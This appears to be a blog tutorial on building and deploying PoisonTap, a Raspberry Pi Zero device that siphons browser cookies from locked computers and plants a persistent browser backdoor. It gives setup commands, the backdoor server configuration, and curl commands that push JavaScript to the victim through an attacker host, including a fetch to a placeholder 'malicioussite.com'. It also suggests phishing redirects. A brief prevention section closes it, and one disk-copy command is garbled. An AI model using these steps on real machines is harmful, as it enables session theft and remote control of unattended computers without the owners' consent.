Poison Computers With Poisontap

Share This:

If you like my work and don’t want to see ads help me fund this blog by becoming a Patron

Disclaimer: The contents of this article are for educational purposes only. Doing the things mentioned in this article on devices that are not yours without consent is illegal. I take no responsibility for your actions.

Imagine your in your office and you leave your desk for a few minutes just to use the bathroom. Your not to concerned about your computer because people will need to type your password in in order to do something. But along comes that janitor and pops in a device into the USB port of your computer and in 30 seconds your computer has been poisoned and under that janitors full power. This is very possible with Poisontap. And for just the costs of a Raspberry Pi Zero and an 8GB MicroSD card you can do just this.

What Is Poisontap?

Posointap was developed by the Hardware Hacker known as Samy Kamkar. His device which is made with the Raspberry Pi Zero siphons cookies and installs backdoors on locked computers. It can do all of the following things. You can obtain all of the information about the project at his website.

In this article I will be showing you how to setup both the Poisontap device and the Poisontap server.

Setting Up Poisontap

In order to make Poisontap you first need to own a Raspberry Pi Zero and a compatible MicroSD Card. You will also need to download the Raspian Lite image from the Raspberry Pi site.

Samy used the Raspberry Pi Zero 1.2 in his project which didn’t have the Camera module or Wifi/Bluetooth. However I used the Raspberry Pi Zero W which has WiFi and the camera module and it worked just fine. However I don’t need the camera module or the WiFi when using Poisontap on the Raspberry Pi Zero W.

First we will burn the Raspbian Lite image to the SD Card. I show how to do this on my other article.

Now that we have burned Raspbian we will open our terminal up and navigate to the boot partition of the MicroSD Card.

cd /media/raspbian/boot

Now we will create a file called SSH.

touch ssh

Now we will need to modify our cmdline.txt file so it will have the following in it.

dwc_otg.lpm_enable=0 console=serial0,115200 console=tty1 root=/dev/mmcblk0p2 rootfstype=ext4 elevator=deadline fsck.repair=yes rootwait modules-load=dwc2,g_ether quiet

Now we will remove the SD Card from our computer place it into the Raspberry Pi Zero then we plug the Raspberry Pi Zero into our computer. Now we will SSH into our Raspberry Pi Zero.

Of course once we have SSHed into the Raspberry Pi Zero we will do all of the usual things like changing the default password and so on. After that we will need to install git onto the Raspbian image. To do this we type the following.

sudo apt-get install git -y

Now that git is installed we will create our git directory, initialize git and clone Samy Kamkar’s GitHub repository.

mkdir git
cd git
git init
git clone https://github.com/samyk/poisontap

Now we will move into the repository.

cd poisontap

Now we will make the pi_startup.sh executable.

chmod +x pi_startup.sh

Now we will execute pi_startup.sh

sudo sh ./pi_startup.sh

We will also need to make pi_startup.sh execute when the Raspberry Pi Zero is plugged in. To do this we will add it to the rc.local file. We will first open the file using the built in text editor of Raspbian Lite called nano.

sudo nano -w /etc/rc.local

Now we will delete all the text in the file. Then we will add the following text to it.

/bin/sh /home/pi/poisontap/pi_startup.sh

Once the line above is added to the rc.local file we will save the file by pressing ALT + X. It will then ask us if we want to save changes we will press the letter Y for yes then press Enter.

Now we will move the dhcpd.conf file in our cloned repository to the /etc/dhcp directory.

sudo mv dhcpd.conf /etc/dhcp/dhcpd.conf

Now we create a poisontap directory in our pi directory.

cd $HOME
mkdir poisontap

Now we move all our existing repository files into the poisontap directory.

mv $HOME/git/poisontap/* $HOME/poisontap/

Now we will logout of our Raspberry Pi Zero SSH session.

sudo shutdown -h now

Now we will unplug the Raspberry Pi Zero from our computer.

Create The Server

Many people seem to have a problem with setting up the server. I honestly think they think the Raspberry Pi Zero is the server. It isn’t, we need additional hardware for the server. In my case I’m using the Banana Pi M3 for the server but you can use anything even a PC. If you need to know how to setup a server on a computer please check my other post.


Setting Up The BPi Server

For the Banana Pi Server I will be using the Ubuntu Mininal Banana Pi M3 image. I’m using this image because it is lite and similar to the Ubuntu Minimal Image for PCs. So readers can setup the server the same way on a PC by simply using the Ubuntu Minimal ISO file for PC’s.

Note: Since I have a Raspberry Pi Zero W I could simply use the Raspberry Pi Zero as a server. To do this I would simply get a second Micro SD card and install the server on the SD Card then swap each SD Card depending on if I wanted it as the Poisontap or a server. I decided against this because the hardware specs on the Raspberry Pi are lower then the Banana Pi.

So the first thing I do is burn the image to the MicroSD Card. Once the image has been burned to the Micro SD Card I will plug it into my Banana Pi M3 and start the Pi up. Next I will login to the image. And since the Banana Pi M3 has 8GB eMMC I will copy the image onto the eMMC by doing the following.

sudo dd if=/ of=/dev/emmc

Now that it is copied to the eMMC it will boot faster and run faster. So I will now shut the pi down, and remove the MicroSD Card. Next I will turn the Pi back on and it will boot into the eMMC.

Now I will change the password and update the system.

sudo passwd
sudo apt-get update
sudo apt-get upgrade
sudo apt-get dist-upgrade
sudo apt-get autoremove

Now we will install the lamp server and set it up the way we normally do. And if you are using a Dynamic IP address you may want to install no-ip and get a domain from no-ip. Just make sure that the domain name you pick is added to the Raspberry Pi Zero target_backdoor.js file.

Once the server is setup we will add the backend_server.js file to the /www directory of the Banana Pi Server.

The Attack

Now lets actually run this attack. I setup a Windows 10 test machine navigated to a website. Then I locked the system. Once the system was locked I needed to login with a password. Of course what I did instead was plug in my Poisontap Raspberry Pi Zero into the USB port. I kept it in for about one minute, then I unplugged it.

Now I placed the MicroSD card into my work machine and navigated to a newly created file on the SD Card called poisontap.cookies.log this tells me all of the cookies the Raspberry Pi fetched from my test computer.

Now that the test computer is infected. I can send it commands through the backdoor. To do this the server will need to be running, so I turn on my server. Once the server is turned on I will use curl to send commands.

curl 'http://serverdomain.com:1337/exec?alert("I have hacked your system.")'

Now obviously this just sends a popup message to the user that tells them they have been hacked. However we can redirect them to a site as well. Maybe we would redirect them to a site that looks like another site so we can fetch their login information when they attempt to login to their account on the fake site. Or maybe we can send them to a site that is designed to hook their browser.

curl 'http://serverdomain.com:1337/exec?$.get("http://malicioussite.com",function(d)\{console..log(d)\})'

Preventing The Attack

If your the client your limitted to how you can prevent the attack. One thing you can do is make sure your file system is encrypted, that your programs aren’t running when your computer is locked. Of course this prevents Poisontap from being used on locked systems. It does work on unlocked systems as well.

You can also make sure your browser doesn’t save cookies or passwords. And always close your web browser when you walk away from the system.

If your a website owner and want to protect your visitors from having their cookies siphoned, you can make sure your using HTTPS and that your site isn’t making any connections to any HTTP servers.

If you like my work and don’t want to see ads help me fund this blog by becoming a Patron